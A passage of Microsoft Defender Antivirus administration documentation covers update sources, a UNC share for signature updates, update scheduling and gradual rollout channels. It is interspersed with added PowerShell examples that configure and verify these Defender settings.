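    # -Arguments are written, every other preference keeps its current value.
    Invoke-CimMethod -ComputerName $ComputerName -Namespace $namespace `
        -ClassName MSFT_MpPreference -MethodName Set `
        -Arguments @{ SignatureFallbackOrder = $Order } | Out-Null
}

$report = Get-DefenderUpdateSourceReport -ComputerName $computers -ExpectedOrder $expectedOrder
$report | Format-Table -AutoSize

# Remediate only devices that answered but hold a different order; unreachable
# devices (FallbackOrder is null) are left for follow-up.
foreach ($row in $report | Where-Object { -not $_.Compliant -and $_.FallbackOrder }) {
    Write-Host "Correcting fallback order on $($row.Computer)"
    Set-DefenderFallbackOrderViaWmi -ComputerName $row.Computer -Order $expectedOrder
}
```

The same Set method takes SignatureDefinitionUpdateFileSharesSource in its -Arguments hashtable, so the file share list can be pushed in the same call when a share is in use.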

Use Mobile Device Management (MDM) to manage the update location
See Policy CSP - Defender/SignatureUpdateFallbackOrder for details on configuring MDM.

What if we're using a third-party vendor?
This article describes how to configure and manage updates for Microsoft Defender Antivirus. However, you can hire third-party vendors to perform these tasks.

For example, suppose that Contoso has hired Fabrikam to manage their security
solution, which includes Microsoft Defender Antivirus. Fabrikam typically uses Windows
Management Instrumentation, PowerShell cmdlets, or Windows command-line to
deploy patches and updates.

Note

Microsoft does not test third-party solutions for managing Microsoft Defender
Antivirus.

Create a UNC share for security intelligence and platform updates
Set up a network file share (UNC/mapped drive) to download security intelligence and platform updates from the MMPC site by using a scheduled task.

1. On the system for which you want to provision the share and download the updates, create a folder for the script.

Console

Start, CMD (Run as admin)
MD C:\Tool\PS-Scripts\

2. Create a folder for signature updates.

Console

MD C:\Temp\TempSigs\x64
MD C:\Temp\TempSigs\x86

3. Download the PowerShell script from www.powershellgallery.com/packages/SignatureDownloadCustomTask/1.4 .

4. Select Manual Download.

5. Select Download the raw nupkg file.

6. Extract the file.

7. Copy the file SignatureDownloadCustomTask.ps1 to the folder you previously created, C:\Tool\PS-Scripts\ .

8. Use the command line to set up the scheduled task.

Note

There are two types of updates: full and delta.

For x64 delta:

PowerShell

# PowerShell (Run as admin)
cd C:\Tool\PS-Scripts\
.\SignatureDownloadCustomTask.ps1 -action create -arch x64 -isDelta $true -destDir C:\Temp\TempSigs\x64 -scriptPath C:\Tool\PS-Scripts\SignatureDownloadCustomTask.ps1 -daysInterval 1

For x64 full:

PowerShell

# PowerShell (Run as admin)
cd C:\Tool\PS-Scripts\
.\SignatureDownloadCustomTask.ps1 -action create -arch x64 -isDelta $false -destDir C:\Temp\TempSigs\x64 -scriptPath C:\Tool\PS-Scripts\SignatureDownloadCustomTask.ps1 -daysInterval 1

For x86 delta:

PowerShell

# PowerShell (Run as admin)
cd C:\Tool\PS-Scripts\
.\SignatureDownloadCustomTask.ps1 -action create -arch x86 -isDelta $true -destDir C:\Temp\TempSigs\x86 -scriptPath C:\Tool\PS-Scripts\SignatureDownloadCustomTask.ps1 -daysInterval 1

For x86 full:

PowerShell

# PowerShell (Run as admin)
cd C:\Tool\PS-Scripts\
.\SignatureDownloadCustomTask.ps1 -action create -arch x86 -isDelta $false -destDir C:\Temp\TempSigs\x86 -scriptPath C:\Tool\PS-Scripts\SignatureDownloadCustomTask.ps1 -daysInterval 1

Note

When the scheduled tasks are created, you can find these in the Task Scheduler under Microsoft\Windows\Windows Defender .

9. Run each task manually and verify that you have data ( mpam-d.exe , mpam-fe.exe , and nis_full.exe ) in the following folders (you might have chosen different locations):

C:\Temp\TempSigs\x86
C:\Temp\TempSigs\x64

If the scheduled task fails, run the following commands:

Console

C:\windows\system32\windowspowershell\v1.0\powershell.exe -NoProfile -executionpolicy allsigned -command "&\"C:\Tool\PS-Scripts\SignatureDownloadCustomTask.ps1\" -action run -arch x64 -isDelta $False -destDir C:\Temp\TempSigs\x64"

C:\windows\system32\windowspowershell\v1.0\powershell.exe -NoProfile -executionpolicy allsigned -command "&\"C:\Tool\PS-Scripts\SignatureDownloadCustomTask.ps1\" -action run -arch x64 -isDelta $True -destDir C:\Temp\TempSigs\x64"

C:\windows\system32\windowspowershell\v1.0\powershell.exe -NoProfile -executionpolicy allsigned -command "&\"C:\Tool\PS-Scripts\SignatureDownloadCustomTask.ps1\" -action run -arch x86 -isDelta $False -destDir C:\Temp\TempSigs\x86"

C:\windows\system32\windowspowershell\v1.0\powershell.exe -NoProfile -executionpolicy allsigned -command "&\"C:\Tool\PS-Scripts\SignatureDownloadCustomTask.ps1\" -action run -arch x86 -isDelta $True -destDir C:\Temp\TempSigs\x86"

10. Create a share pointing to C:\Temp\TempSigs (for example, \\server\updates ).

Note

At a minimum, authenticated users must have "Read" access. This requirement also applies to domain computers, the share, and NTFS (security).

11. Set the share location in the policy to the share.

Note

Do not add the x64 (or x86) folder in the path. The mpcmdrun.exe process adds it automatically.
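
The following script is an added example and is not part of the Microsoft article. It carries steps 9 through 11 above through as code: it confirms that the scheduled tasks have populated both architecture folders with the full and delta packages, grants Authenticated Users read-only access at both the NTFS and share level, publishes the folder as an SMB share, and finally points a client at the share root and pulls an update from that source alone to prove the path and permissions work. The folder, share name and package names are the ones from the procedure; the share is published under the local computer name, which stands in for the article's \\server.

```powershell
# Added example (not from the Microsoft article): publish C:\Temp\TempSigs as a
# read-only share and point Defender at it. Steps 1-3 run on the download host,
# steps 4-5 on a client that should use the share.

$root      = 'C:\Temp\TempSigs'
$shareName = 'updates'                                   # article's sample share name
$expected  = 'mpam-d.exe', 'mpam-fe.exe', 'nis_full.exe' # packages the tasks download

# 1. Confirm each architecture folder holds the full and delta packages before sharing
#    it; an empty share would make clients fall through to the next source silently.
foreach ($arch in 'x86', 'x64') {
    $dir     = Join-Path $root $arch
    $missing = $expected | Where-Object { -not (Test-Path (Join-Path $dir $_)) }
    if ($missing) {
        throw "$dir is missing: $($missing -join ', '). Run the scheduled tasks first."
    }
}

# 2. NTFS: Authenticated Users (which covers domain computer accounts) get read and
#    execute only, inherited by the x86 and x64 subfolders and their files.
$acl  = Get-Acl -Path $root
$rule = New-Object System.Security.AccessControl.FileSystemAccessRule(
    'Authenticated Users', 'ReadAndExecute', 'ContainerInherit,ObjectInherit', 'None', 'Allow')
$acl.AddAccessRule($rule)
Set-Acl -Path $root -AclObject $acl

# 3. Share: read-only share permissions. Nothing but the scheduled task on this host
#    ever writes to the folder, so no principal needs Change or Full on the share.
if (-not (Get-SmbShare -Name $shareName -ErrorAction SilentlyContinue)) {
    New-SmbShare -Name $shareName -Path $root -ReadAccess 'Authenticated Users' | Out-Null
}
$uncPath = "\\$env:COMPUTERNAME\$shareName"
Write-Host "Share published at $uncPath"

# 4. Client: the file share source is the share root without an x64/x86 suffix
#    (mpcmdrun.exe appends it), and the share sits ahead of MMPC in the fallback order.
Set-MpPreference -SignatureDefinitionUpdateFileSharesSource $uncPath
Set-MpPreference -SignatureFallbackOrder 'InternalDefinitionUpdateServer|MicrosoftUpdateServer|FileShares|MMPC'

# 5. Client: update from the share only, so a wrong path or permission shows up here
#    instead of being masked by a successful download from another source.
Update-MpSignature -UpdateSource FileShares
Get-MpComputerStatus | Select-Object AntivirusSignatureVersion, AntivirusSignatureLastUpdated
```

If step 5 fails on the client, check the share path from that device with Test-Path and compare the NTFS and share permissions with Get-Acl and Get-SmbShareAccess before changing anything in the policy.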

Related articles
Deploy Microsoft Defender Antivirus
Manage Microsoft Defender Antivirus updates and apply baselines
Manage updates for endpoints that are out of date
Manage event-based forced updates
Manage updates for mobile devices and VMs
Microsoft Defender Antivirus in Windows 10


Manage the schedule for when protection updates should be downloaded and applied
Article • 03/15/2023

Important

Customers who applied the March 2022 Microsoft Defender engine update (1.1.19100.5) might have encountered high resource utilization (CPU and/or memory). Microsoft has released an update (1.1.19200.5) that resolves the bugs introduced in the earlier version. Customers are recommended to update to this new engine build of Antivirus Engine (1.1.19200.5). To ensure any performance issues are fully fixed, it is recommended to reboot machines after applying the update. For more information, see Monthly platform and engine versions.

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender Antivirus

Platforms

Windows

Microsoft Defender Antivirus lets you determine when it should look for and download
updates.

You can schedule updates for your endpoints by:

Specifying the day of the week to check for protection updates
Specifying the interval to check for protection updates
Specifying the time to check for protection updates

You can also randomize the times when each endpoint checks and downloads protection updates. See the Schedule scans topic for more information.

Use Configuration Manager to schedule protection updates
1. On your Microsoft Configuration Manager console, open the antimalware policy you want to change (click Assets and Compliance in the navigation pane on the left, then expand the tree to Overview > Endpoint Protection > Antimalware Policies).

2. Go to the Security intelligence updates section.

3. To check and download updates at a certain time:

Set Check for Endpoint Protection security intelligence updates at a specific interval... to 0.
Set Check for Endpoint Protection security intelligence updates daily at... to the time when updates should be checked.

4. To check and download updates on a continual interval, set Check for Endpoint Protection security intelligence updates at a specific interval... to the number of hours that should occur between updates.

5. Deploy the updated policy as usual.

Use Group Policy to schedule protection updates

Important

By default, "SignatureScheduleDay" is set as "8" and "SignatureUpdateInterval" is set as "0" so Microsoft Defender Antivirus will not schedule protection updates. Enabling these settings will override that default.

1. On your Group Policy management machine, open the Group Policy Management
Console, right-click the Group Policy Object you want to configure and click Edit.

2. In the Group Policy Management Editor go to Computer configuration.

3. Click Policies then Administrative templates.

4. Expand the tree to Windows components > Microsoft Defender Antivirus >
Security Intelligence Updates and configure the following settings:

a. Double-click the Specify the day of the week to check for security intelligence
updates setting and set the option to Enabled. Enter the day of the week to
check for updates. Click OK.
b. Double-click the Specify the interval to check for security intelligence updates
setting and set the option to Enabled. Enter the number of hours between
updates. Click OK.

c. Double-click the Specify the time to check for security intelligence updates
setting and set the option to Enabled. Enter the time when updates should be
checked. The time is based on the local time of the endpoint. Click OK.

Use PowerShell cmdlets to schedule protection updates
Use the following cmdlets:

PowerShell

Set-MpPreference -SignatureScheduleDay
Set-MpPreference -SignatureScheduleTime
Set-MpPreference -SignatureUpdateInterval

See Use PowerShell cmdlets to configure and run Microsoft Defender Antivirus and
Defender Antivirus cmdlets for more information on how to use PowerShell with
Microsoft Defender Antivirus.
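
The following script is an added example and is not part of the Microsoft article. It wraps the three cmdlet parameters listed above in a function that takes the day as one of the names the cmdlet accepts (Everyday, the weekday names, or Never, which corresponds to the default value 8 from the Important note above), the time as a TimeSpan since midnight in the endpoint's local time, and the interval in hours (0 disables interval checks, the other default). A second function reads the effective schedule back and reports whether any check is scheduled at all. The schedule values used in the call are chosen for the example.

```powershell
# Added example (not from the Microsoft article): configure and verify the protection
# update schedule with Set-MpPreference / Get-MpPreference.

function Set-DefenderUpdateSchedule {
    param(
        # Everyday, Sunday..Saturday, or Never (the default the article describes as 8).
        [ValidateSet('Everyday', 'Sunday', 'Monday', 'Tuesday', 'Wednesday',
                     'Thursday', 'Friday', 'Saturday', 'Never')]
        [string]$Day = 'Everyday',

        # Local time of the endpoint at which the day-of-week check runs.
        [timespan]$Time = (New-TimeSpan -Hours 2),

        # Hours between interval checks; 0 (the default) turns interval checks off.
        [ValidateRange(0, 24)]
        [int]$IntervalHours = 0
    )

    Set-MpPreference -SignatureScheduleDay $Day
    Set-MpPreference -SignatureScheduleTime $Time
    Set-MpPreference -SignatureUpdateInterval $IntervalHours
}

function Get-DefenderUpdateSchedule {
    $p = Get-MpPreference
    [pscustomobject]@{
        ScheduleDay   = $p.SignatureScheduleDay        # 0 = Everyday, 1-7 = Sunday..Saturday, 8 = Never
        ScheduleTime  = $p.SignatureScheduleTime       # time of day on the endpoint
        IntervalHours = $p.SignatureUpdateInterval
        # With Never and 0 (both defaults) no scheduled check exists; either setting
        # on its own is enough to schedule checks.
        Scheduled     = ($p.SignatureScheduleDay -ne 8) -or ($p.SignatureUpdateInterval -gt 0)
    }
}

# Example schedule: a daily check at 02:00 local time plus a check every 4 hours.
Set-DefenderUpdateSchedule -Day Everyday -Time (New-TimeSpan -Hours 2) -IntervalHours 4
Get-DefenderUpdateSchedule | Format-List

# Returning to the unscheduled default from the Important note above:
# Set-DefenderUpdateSchedule -Day Never -IntervalHours 0
```

As with the update sources, a value set through Group Policy or Intune overrides what the cmdlet writes, so Get-DefenderUpdateSchedule is the check that tells you what the endpoint actually does.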

Use Windows Management Instrumentation (WMI) to schedule protection updates
Use the Set method of the MSFT_MpPreference class for the following properties:

WMI

SignatureScheduleDay
SignatureScheduleTime
SignatureUpdateInterval

See the following for more information and allowed parameters:

Windows Defender WMIv2 APIs

Tip

If you're looking for Antivirus related information for other platforms, see:
Set preferences for Microsoft Defender for Endpoint on macOS
Microsoft Defender for Endpoint on Mac
macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune
Configure Microsoft Defender for Endpoint on iOS features
Configure Defender for Endpoint on Android features
Set preferences for Microsoft Defender for Endpoint on Linux
Microsoft Defender for Endpoint on Linux

Related articles
Deploy Microsoft Defender Antivirus
Manage Microsoft Defender Antivirus updates and apply baselines
Manage updates for endpoints that are out of date
Manage event-based forced updates
Manage updates for mobile devices and virtual machines (VMs)
Microsoft Defender Antivirus in Windows 10 and 11


Manage the gradual rollout process for Microsoft Defender updates
Article • 02/26/2024

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender Antivirus

Platforms

Windows

It's important to ensure that client components are up to date to deliver critical
protection capabilities and prevent attacks.

Capabilities are provided through several components:

Endpoint Detection & Response
Next-generation protection with cloud-delivered protection
Attack Surface Reduction

Updates are released monthly using a gradual release process. This process helps to
enable early failure detection to identify issues as they occur and address them quickly
before a larger rollout.

Note

For more information on how to control daily security intelligence updates, see
Schedule Microsoft Defender Antivirus protection updates. Updates ensure that
next-generation protection can defend against new threats, even if cloud-delivered
protection is not available to the endpoint.

Microsoft gradual rollout model
The following gradual rollout model is followed for monthly Defender updates:

1. The first release goes out to Beta channel subscribers.

2. After validation, feedback, and fixes, we start the gradual rollout process in a throttled way and to Preview channel subscribers first.

3. We then proceed to release the update to the rest of the global population, scaling out from 10-100%.

Our engineers continuously monitor impact and escalate any issues to create a fix as
needed.

How to customize your internal deployment process
If your machines are receiving Defender updates from Windows Update, the gradual rollout process can result in some of your devices receiving Defender updates sooner than others. The following section explains how to define a strategy that will allow automatic updates to flow differently to specific groups of devices by using update channel configuration.

Note

When planning for your own gradual release, please make sure to always have a
selection of devices subscribed to the preview and staged channels. This will
provide your organization as well as Microsoft the opportunity to prevent or find
and fix issues specific to your environment.

For machines receiving updates through, for example, Windows Server Update Services
(WSUS) or Microsoft Configuration Manager, more options are available to all Windows
updates, including options for Microsoft Defender for Endpoint.

Learn more about how to use solutions such as WSUS and MECM to manage the
distribution and application of updates at Manage Microsoft Defender Antivirus
updates and apply baselines - Windows security.

Update channels for monthly updates
You can assign a machine to an update channel to define the cadence in which a machine receives monthly engine and platform updates.

For more information on how to configure updates, see Create a custom gradual rollout process for Microsoft Defender updates.
The following update channels are available:

Channel name: Beta Channel - Prerelease
Description: Test updates before others
Application: Devices set to this channel are the first to receive new monthly updates. Select Beta Channel to participate in identifying and reporting issues to Microsoft. Devices in the Windows Insider Program are subscribed to this channel by default. For use in test environments only.

Channel name: Current Channel (Preview)
Description: Get Current Channel updates earlier during gradual release
Application: Devices set to this channel are offered updates earliest during the gradual release cycle. Suggested for pre-production/validation environments.

Channel name: Current Channel (Staged)
Description: Get Current Channel updates later during gradual release
Application: Devices are offered updates later during the gradual release cycle. Suggested to apply to a small, representative part of your device population (~10%).

Channel name: Current Channel (Broad)
Description: Get updates at the end of gradual release
Application: Devices will be offered updates only after the gradual release cycle completes. Suggested to apply to a broad set of devices in your production population (~10-100%).

Channel name: Critical: Time Delay
Description: Delay Defender updates
Application: Devices are offered updates with a 48-hour delay. Best for datacenter machines that only receive limited updates. Suggested for critical environments only.

Channel name: (default)
Application: If you disable or don't configure this policy, the device remains in Current Channel (Default): Stay up to date automatically during the gradual release cycle. This means Microsoft assigns a channel to the device. The channel selected by Microsoft might be one that receives updates early during the gradual release cycle, which isn't suitable for devices in a production or critical environment.

Update channels for security intelligence updates
You can also assign a machine to a channel to define the cadence in which it receives SIUs (formerly referred to as signature, definition, or daily updates). Unlike the monthly process, there's no Beta channel and this gradual release cycle occurs multiple times a day.

Channel name: Current Channel (Staged)
Description: Get Current Channel updates later during gradual release
Application: Devices are offered updates later during the gradual release cycle. Suggested to apply to a small, representative part of your device population (~10%).

Channel name: Current Channel (Broad)
Description: Get updates at the end of gradual release
Application: Devices will be offered updates after the gradual release cycle. Best for datacenter machines that only receive limited updates. Note: this setting applies to all Defender updates.

Channel name: (default)
Application: If you disable or don't configure this policy, the device remains in Current Channel (Default): Stay up to date automatically during the gradual release cycle. This means Microsoft assigns a channel to the device. The channel selected by Microsoft might be one that receives updates early during the gradual release cycle, which isn't suitable for devices in a production or critical environment.

Note

In case you wish to force an update to the newest signature instead of leveraging the time delay, you will need to remove this policy first.

Update guidance
In most cases, the recommended configuration when using Windows Update is to allow endpoints to receive and apply monthly Defender updates as they arrive. This option provides the best balance between protection and possible impact associated with the changes they can introduce.

For environments where there's a need for a more controlled gradual rollout of automatic Defender updates, consider an approach with deployment groups:

1. Participate in the Windows Insider program or assign a group of devices to the Beta Channel.

2. Designate a pilot group that opts-in to Preview Channel, typically validation environments, to receive new updates early.

3. Designate a group of machines that receive updates later during the gradual rollout from Staged channel. Typically, this group would be a representative ~10% of the population.

4. Designate a group of machines that receive updates after the gradual release cycle completes. These are typically important production systems.

For the remainder of devices, the default setting is to receive new updates as they arrive during the Microsoft gradual rollout process and no further configuration is required.

Adopting this model:

Allows you to test early releases before they reach a production environment
Ensures the production environment still receives regular updates and protection against critical threats.
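
The following script is an added example and is not part of the Microsoft article. It expresses the four deployment groups from the guidance above, plus the unconfigured remainder, as a mapping to update channels and applies the mapping on a device with Set-MpPreference. The channel parameters (-PlatformUpdatesChannel, -EngineUpdatesChannel, -DefinitionUpdatesChannel) and the channel values (NotConfigured, Beta, Preview, Staged, Broad) are those of the Defender cmdlets in Microsoft Defender Antivirus 4.18.2106 and later, not something this article lists; the group names are constructed for the example. Because the daily security intelligence rollout has no Beta or Preview channel, the beta and pilot groups leave -DefinitionUpdatesChannel unconfigured.

```powershell
# Added example (not from the Microsoft article): assign a device to the update
# channels for its deployment group. Run on each device with the group it belongs to.

# Deployment groups from the guidance above, mapped to monthly (platform, engine)
# and daily (security intelligence) channels.
$channelByGroup = @{
    # Windows Insider / Beta Channel devices: monthly updates first; daily has no Beta.
    beta    = @{ Platform = 'Beta';          Engine = 'Beta';          Definitions = 'NotConfigured' }
    # Pilot group in validation environments: Preview; daily has no Preview either.
    pilot   = @{ Platform = 'Preview';       Engine = 'Preview';       Definitions = 'NotConfigured' }
    # Representative ~10% of the population: later in the gradual rollout.
    staged  = @{ Platform = 'Staged';        Engine = 'Staged';        Definitions = 'Staged' }
    # Important production systems: only after the gradual release cycle completes.
    broad   = @{ Platform = 'Broad';         Engine = 'Broad';         Definitions = 'Broad' }
    # Everything else: leave channel selection to Microsoft (the article's default).
    default = @{ Platform = 'NotConfigured'; Engine = 'NotConfigured'; Definitions = 'NotConfigured' }
}

function Set-DefenderUpdateChannels {
    param(
        [Parameter(Mandatory)]
        [ValidateSet('beta', 'pilot', 'staged', 'broad', 'default')]
        [string]$Group
    )
    $c = $channelByGroup[$Group]
    Set-MpPreference -PlatformUpdatesChannel   $c.Platform
    Set-MpPreference -EngineUpdatesChannel     $c.Engine
    Set-MpPreference -DefinitionUpdatesChannel $c.Definitions
}

function Get-DefenderUpdateChannels {
    # Read back the effective channels; a Group Policy or Intune setting for the same
    # channel wins over the cmdlet, so this is the value the device actually uses.
    Get-MpPreference | Select-Object PlatformUpdatesChannel, EngineUpdatesChannel, DefinitionUpdatesChannel
}

# Example: this device belongs to the ~10% staged group.
Set-DefenderUpdateChannels -Group staged
Get-DefenderUpdateChannels
```

Keeping the mapping in one table makes the rollout policy reviewable in one place and avoids the common mistake of putting a production device on a monthly Broad channel while its daily updates still arrive on the Microsoft-assigned default.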

Management tools
To create your own custom gradual rollout process for monthly updates, you can use
the following tools:

Group policy
Microsoft Intune
PowerShell

For details on how to use these tools, see Create a custom gradual rollout process for Microsoft Defender updates.

Tip

If you're looking for Antivirus related information for other platforms, see:

Set preferences for Microsoft Defender for Endpoint on macOS
Microsoft Defender for Endpoint on Mac
macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune
Set preferences for Microsoft Defender for Endpoint on Linux
Microsoft Defender for Endpoint on Linux
Configure Defender for Endpoint on Android features
Configure Microsoft Defender for Endpoint on iOS features


Create a custom gradual rollout process for Microsoft Defender updates
Article • 02/16/2024

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender Antivirus

Platforms

Windows

Note

This functionality requires Microsoft Defender Antivirus version 4.18.2106.X or newer.

To create your own custom gradual rollout process for Defender updates, you can use
Group Policy, Intune, and PowerShell.

The following table lists the available group policy settings for configuring update channels:

Setting title: Select gradual Microsoft Defender monthly platform update rollout channel
Description: Enable this policy to specify when devices receive Microsoft Defender platform updates during the monthly gradual rollout.
Beta Channel: Devices set to this channel are the first to receive new updates. Select Beta Channel to participate in identifying and reporting issues to Microsoft. Devices in the Windows Insider Program are subscribed to this channel by default. For use in (manual) test environments only and a limited number of devices.
Current Channel (Preview): Devices set to this channel are offered updates earliest during the monthly gradual release cycle. Suggested for pre-production/validation environments.
Current Channel (Staged): Devices are offered updates after the monthly gradual release cycle. Suggested to apply to a small, representative part of your production population (~10%).
Current Channel (Broad): Devices are offered updates only after the gradual release cycle completes. Suggested to apply to a broad set of devices in your production population (~10-100%).
Critical- Time Delay: Devices are offered updates with a 48-hour delay. Suggested for critical environments only.
If you disable or don't configure this policy, the device stays up to date automatically during the gradual release cycle. Suitable for most devices.
Location: Windows Components\Microsoft Defender Antivirus

Setting title: Select gradual Microsoft Defender monthly engine update rollout channel
Description: Enable this policy to specify when devices receive Microsoft Defender engine updates during the monthly gradual rollout.
Beta Channel: Devices set to this channel are the first to receive new updates. Select Beta Channel to participate in identifying and reporting issues to Microsoft. Devices in the Windows Insider Program are subscribed to this channel by default. For use in (manual) test environments only and a limited number of devices.
Current Channel (Preview): Devices set to this channel are offered updates earliest during the monthly gradual release cycle. Suggested for pre-production/validation environments.
Current Channel (Staged): Devices are offered updates after the monthly gradual release cycle. Suggested to apply to a small, representative part of your production population (~10%).
Current Channel (Broad): Devices are offered updates only after the gradual release cycle completes. Suggested to apply to a broad set of devices in your production population (~10-100%).
Critical- Time Delay: Devices are offered updates with a 48-hour delay. Suggested for critical environments only.
If you disable or don't configure this policy, the device stays up to date automatically during the gradual release cycle. Suitable for most devices.
Location: Windows Components\Microsoft Defender Antivirus

Setting title: Select gradual Microsoft Defender daily security intelligence updates rollout channel
Description: Enable this policy to specify when devices receive Microsoft Defender security intelligence updates during the daily gradual rollout.
Current Channel (Staged): Devices are offered updates after the release cycle. Suggested to apply to a small, representative part of production population (~10%).
Current Channel (Broad): Devices are offered updates only after the gradual release cycle completes. Suggested to apply to a broad set of devices in your production population (~10-100%).
If you disable or don't configure this policy, the device stays up to date automatically during the daily release cycle. Suitable for most devices.
Location: Windows Components\Microsoft Defender Antivirus

Setting title: Disable gradual rollout of Microsoft Defender updates
Description: Enable this policy to disable gradual rollout of Defender updates.
Current Channel (Broad): Devices set to this channel are offered updates last during the gradual release cycle. Best for datacenter machines that only receive limited updates.
Note: This setting applies to both monthly and daily Defender updates and overrides any previously configured channel selections for platform and engine updates.
If you disable or don't configure this policy, the device remains in Current Channel (Default) unless specified otherwise in specific channels for platform and engine updates. Stay up to date automatically during the gradual release cycle. Suitable for most devices.
Location: Windows Components\Microsoft Defender Antivirus\MpEngine

Group Policy

Note

An updated Defender ADMX template is published together with the 21H2 release of Windows 10. A non-localized version is available for download at defender-updatecontrols on GitHub.

You can use Group Policy to configure and manage Microsoft Defender Antivirus on
your endpoints.

In general, you can use the following procedure to configure or change Microsoft
Defender Antivirus group policy settings:

1. On your Group Policy management machine, open the Group Policy Management
Console, right-click the Group Policy Object (GPO) you want to configure and
select Edit.

2. Using the Group Policy Management Editor, go to Computer configuration.

3. Select Administrative templates.

4. Expand the tree to Windows components > Microsoft Defender Antivirus.

5. Expand the section (referred to as Location in the table in this article) that contains
the setting you want to configure, double-click the setting to open it, and make
configuration changes.

6. Deploy the updated GPO as you normally do.

Intune
Follow the instructions in the link below to create a custom policy in Intune:

Add custom settings for Windows 10 devices in Microsoft Intune.

For more information on the Defender CSP used for the gradual rollout process, see
Defender CSP.

PowerShell
Use the Set-MpPreference cmdlet to configure the gradual rollout of updates.

Use the following parameters:

PowerShell

Set-MpPreference
-PlatformUpdatesChannel Beta|Preview|Staged|Broad|Delayed|NotConfigured
-EngineUpdatesChannel Beta|Preview|Staged|Broad|Delayed|NotConfigured
-DisableGradualRelease 1|0
-DefinitionUpdatesChannel Staged|Broad|NotConfigured

Example:

Use Set-MpPreference -PlatformUpdatesChannel Beta to configure platform updates to arrive from the Beta Channel.

For more information on the parameters and how to configure them, see Set-MpPreference (Microsoft Defender Antivirus).
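The following added example (not from the Microsoft article) applies one deployment ring's channel settings with Set-MpPreference and reads them back with Get-MpPreference, so a setting that did not take (for example, one overridden by Group Policy or Intune) shows up immediately. The ring names, the $Rings map, the Set-DefenderRing function and the numeric channel codes are this example's own assumptions; the channel values follow the pilot and production recommendations in these articles.

```powershell
# Added example (not from the Microsoft article): apply one deployment ring's channel
# settings with Set-MpPreference, then read them back with Get-MpPreference so a
# setting that did not take (for example, overridden by Group Policy or Intune) is
# visible immediately. Ring names, $Rings and Set-DefenderRing are this example's own;
# the channel values follow the pilot/production tables in the ring deployment articles.
# Run from an elevated PowerShell session on the endpoint.

$Rings = @{
    # Pilot (UAT/Test/QA): earliest engine/platform updates, staged definitions.
    Pilot = @{
        PlatformUpdatesChannel   = 'Beta'
        EngineUpdatesChannel     = 'Beta'
        DefinitionUpdatesChannel = 'Staged'
    }
    # Production: 48-hour delay for engine/platform, broad channel for definitions.
    Production = @{
        PlatformUpdatesChannel   = 'Delayed'
        EngineUpdatesChannel     = 'Delayed'
        DefinitionUpdatesChannel = 'Broad'
    }
}

# Get-MpPreference reports the channels as numbers. This mapping follows the Defender
# CSP numbering and is an assumption of this example; check it against your own build.
$ChannelCode = @{
    NotConfigured = 0; Beta = 2; Preview = 3; Staged = 4; Broad = 5; Delayed = 6
}

function Set-DefenderRing {
    [CmdletBinding(SupportsShouldProcess)]
    param(
        [Parameter(Mandatory)]
        [ValidateSet('Pilot', 'Production')]
        [string]$Ring
    )

    $desired = $Rings[$Ring]

    if ($PSCmdlet.ShouldProcess($env:COMPUTERNAME, "apply '$Ring' ring update channels")) {
        # Gradual release must stay enabled; disabling it overrides the channel selections.
        Set-MpPreference -DisableGradualRelease $false
        Set-MpPreference -PlatformUpdatesChannel   $desired.PlatformUpdatesChannel
        Set-MpPreference -EngineUpdatesChannel     $desired.EngineUpdatesChannel
        Set-MpPreference -DefinitionUpdatesChannel $desired.DefinitionUpdatesChannel
    }

    # Compliance read-back: one row per setting, accepting either the name or its code.
    $actual = Get-MpPreference
    foreach ($name in $desired.Keys) {
        $want = $desired[$name]
        $have = [string]$actual.$name
        [pscustomobject]@{
            Setting  = $name
            Expected = $want
            Actual   = $have
            InSync   = ($have -eq $want -or $have -eq [string]$ChannelCode[$want])
        }
    }
}

# Preview the production ring change, then apply it and show the result.
Set-DefenderRing -Ring Production -WhatIf
Set-DefenderRing -Ring Production | Format-Table -AutoSize
```

Any row with InSync = False points at a conflicting policy source worth tracking down before the ring is considered deployed.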

Note

You can also use a management tool such as Microsoft Configuration Manager to
run PowerShell scripts. See Create and run PowerShell scripts from the
Configuration Manager console for guidance on this topic.

Tip

If you're looking for Antivirus related information for other platforms, see:

Set preferences for Microsoft Defender for Endpoint on macOS
Microsoft Defender for Endpoint on Mac
macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune
Set preferences for Microsoft Defender for Endpoint on Linux
Microsoft Defender for Endpoint on Linux
Configure Defender for Endpoint on Android features
Configure Microsoft Defender for Endpoint on iOS features

Tip

Do you want to learn more? Engage with the Microsoft Security community in our Tech Community: Microsoft Defender for Endpoint Tech Community.


Deploy Microsoft Defender Antivirus in
rings
Article • 12/01/2023

Applies to:

Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR
Microsoft Defender Antivirus

Platforms

Windows
Windows Server

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Microsoft Defender for Endpoint is an enterprise endpoint security platform designed to
help enterprise networks prevent, detect, investigate, and respond to advanced threats.

Tip

Microsoft Defender for Endpoint is available in two plans, Defender for Endpoint Plan 1 and Plan 2. A new Microsoft Defender Vulnerability Management add-on is now available for Plan 2.

You can deploy Microsoft Defender for Endpoint using a ring-based deployment approach and keep it updated using the gradual rollout process.

Ring deployment overview

It's important to ensure that client components are up to date to deliver critical protection capabilities and prevent attacks. Capabilities are provided through several components:

Endpoint Detection & Response
Next-generation protection with cloud-delivered protection
Attack Surface Reduction

Updates are released monthly using a gradual release process. This process supports early failure detection: a problem specific to your environment is identified as it occurs and can be addressed quickly, before a larger rollout.

Note

For more information on how to control daily security intelligence updates, see
Schedule Microsoft Defender Antivirus protection updates. Updates ensure that
next-generation protection can defend against new threats, even if cloud-delivered
protection is not available to the endpoint.

This article provides overview information about deploying Microsoft Defender Antivirus
in rings for a gradual rollout process.

Management tools

To create your own custom gradual rollout process for daily and/or monthly updates, you can use the following methods and tools:

Microsoft Intune and Microsoft Update - Requires direct access to the internet. Microsoft Update (MU), formerly known as Windows Update (WU)
System Center Configuration Manager and Windows Server Update Services - System Center Configuration Manager (SCCM) Software Update Point (SUP) = SCCM + Windows Server Update Services (WSUS)
Group Policy and Microsoft Update - Requires direct access to the internet
Group Policy and network share - For example, UNC path, SMB, CIFS
Group Policy and WSUS

